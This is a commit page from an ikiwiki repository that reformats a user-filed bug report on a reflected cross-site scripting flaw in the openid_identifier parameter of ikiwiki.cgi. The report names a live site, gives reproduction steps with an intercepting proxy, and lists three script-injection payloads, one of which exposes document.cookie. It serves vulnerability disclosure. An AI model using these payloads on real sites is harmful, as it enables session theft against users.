urosm
/
ikiwiki
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

fix formatting

master
http://smcv.pseudorandom.co.uk/ 2015-03-30 06:56:25 -04:00 committed by admin
parent c68c044d87
commit 7da5085589
1 changed files with 5 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
doc/bugs/XSS_Alert...__33____33____33__.mdwn
View File

@ -5,14 +5,16 @@ Vulnerable Links:
webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
How To Reproduce The Vulnerability :
1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
3. forward the request
XSS Payload :
1. "></script><script>prompt(909043)</script>
2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
3. "></script><script>prompt(document.cookie)</script>
1. `"></script><script>prompt(909043)</script>`
2. `"></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>`
3. `"></script><script>prompt(document.cookie)</script>`
NOTE : Proof of concept is attached.